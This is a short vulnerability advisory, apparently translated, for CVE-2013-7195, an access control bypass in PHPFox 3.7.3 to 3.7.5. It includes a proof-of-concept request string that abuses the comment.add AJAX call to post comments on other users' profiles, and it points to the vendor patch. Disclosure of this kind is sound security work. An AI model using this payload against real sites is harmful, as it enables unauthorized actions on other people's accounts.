PHPFox access control security restriction bypass vulnerability (CVE-2013-7195)

2014-04-09T00:00:00
ID MYHACK58:62201444312
Type myhack58
Reporter Anonymous
Modified 2014-04-09T00:00:00

Description

Affected system:

PHPFox PHPFox

Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 66672
CVE(CAN) ID: CVE-2013-7195

PHPFox is a social network script.

PHPFox 3.7.3, 3.7.4, and 3.7.5 contain a security restriction bypass vulnerability in their implementation, which an attacker can exploit.

<source: Wesley Henrique >

Test method:
--------------------------------------------------------------------------------

Warning

The following procedure (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

PHPFox
------
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's home page:

www.phpfox.com